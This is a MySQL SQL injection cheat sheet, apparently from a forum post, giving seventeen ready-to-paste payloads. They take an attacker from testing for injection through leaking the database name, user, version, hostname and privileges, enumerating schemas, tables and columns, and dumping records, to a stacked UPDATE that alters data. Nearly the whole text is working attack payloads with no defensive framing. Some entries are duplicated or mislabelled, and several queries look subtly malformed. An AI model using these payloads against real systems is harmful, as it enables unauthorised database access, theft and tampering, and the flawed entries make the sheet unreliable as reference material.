MySQL Blind SQL Cheat Sheets

1. To test blind injection Trích dẫn: ' and 'x'='x 2. To select the current database (Output will be in Hexadecimal, decode to ASCII Trích dẫn: ' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 3. To find the current user Trích dẫn: 1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 4. To find MySQL Version 1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 5. Find current database Trích dẫn: 1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 6. To find the system user Trích dẫn: 1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 7. To find the hostname Trích dẫn: 1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 8. To find the installation directory Trích dẫn: 1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 9. To find the DB User Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 10. To find the databases Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response. Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 11. To count the number of tables in the selected database Note: Note this count as n Replace colored strings with appropriate value Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 12. To get the table names in the selected database Note: m-n implies execute this query starting from m, m+1…n-1 Replace colored strings with appropriate value Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 13. To get number of columns in the selected table name Note: Note this count as n Replace colored strings with appropriate value Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 14. To get column names of a selected table name Note: m-n implies execute this query starting from m, m+1…n-1 Replace colored strings with appropriate value Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 15. To count the number of records in a selected column Note: Remember this count as n Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count,0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 16. To fetch records from a selected column Note: m-n implies execute this query starting from m, m+1…n-1 Replace colored strings with appropriate value Trích dẫn: 1' and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 17. Update a record in the selected column Trích dẫn: 1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--